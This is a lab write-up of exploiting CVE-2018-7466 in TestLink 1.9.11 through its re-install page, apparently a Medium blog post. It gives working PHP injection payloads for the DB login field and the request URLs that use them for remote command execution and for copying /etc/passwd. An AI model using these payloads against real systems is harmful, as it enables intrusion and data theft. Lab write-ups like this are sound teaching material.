PA Attack Defense Lab [CVE-2018–7466]

  1. Fingerprinting the Website
  2. Looking for possible exploits
  3. Remote Code Execution
  4. Examining the exploit

1. Fingerprinting the Website

  • Landing page -> /login.php
  • Version -> [TestLink 1.9.11(The Robots of Dawn)]
[Login page]
  • Making test account -> index.php?caller=login
  • We get another sign of version [TestLink 1.9.11(The Robots of Dawn)]
[Top right corner of index.php]

2. Looking for possible exploits

[searchsploit result for TestLink]
  • Vulnerable code is in file “install/installNewDB.php”. Testlink allows the user to re-install it and when the user visits the “/install/” directory and reaches to “Database detail” page i.e “install/installNewDB.php”, the user can specify PHP code in the “TestLink DB login” field. After successful installation, PHP code is saved in the config file. [https://www.exploit-db.com/exploits/44226]

3. Remote Code Execution

  1. Starting the new installation
  • https://<lab-link>/install
  • Click New installation
[Installation page]
[Verification of System and configuration requirements page]
Database name: app
Database Admin User: pentester
Database Admin Password: password1
"box');echo system($_REQUEST['kekw']);//"
[Create DB, testlink DB user, structures and default data & create configuration file page]
[Verify the procedure result and continue to TestLink login page]
https://<lab-link>/config_db.inc.php?kekw=<command>
[Remote code Exectuion]

4 . Examining the exploit

  • When the attacker provides credentials of a Remote MySQL server that is attacker-controlled(in our case DB “app”) and listening for the remote connection. The attacker just needs to specify the remote MySQL server IP, root users username, password and need to specify custom PHP code in the “TestLink DB login” field.
"box');file_put_contents($_GET[KEKW],file_get_contents($_GET[POG]));//"
  • Once the script establishes a successful connection to the root user account of the remote MySQL server, it will create a MySQL user with the name :
"box');file_put_contents($_GET[KEKW],file_get_contents($_GET[POG]));//"
[View of config_db.inc.php after inserting the name with PHP code]
  • For instance, we can insert the content of file/external payload into system file to get a shell or execute commands
  • One easy use case can be reading “/etc/passwd”:
http://<lab-link>/config_db.inc.php?KEKW=passwd.txt&POG=/etc/passwd
[content of /etc/passwd written to passwd.txt]

Thank you for your time
Cheers!!

--

--

Get the Medium app

A button that says 'Download on the App Store', and if clicked it will lead you to the iOS App store
A button that says 'Get it on, Google Play', and if clicked it will lead you to the Google Play store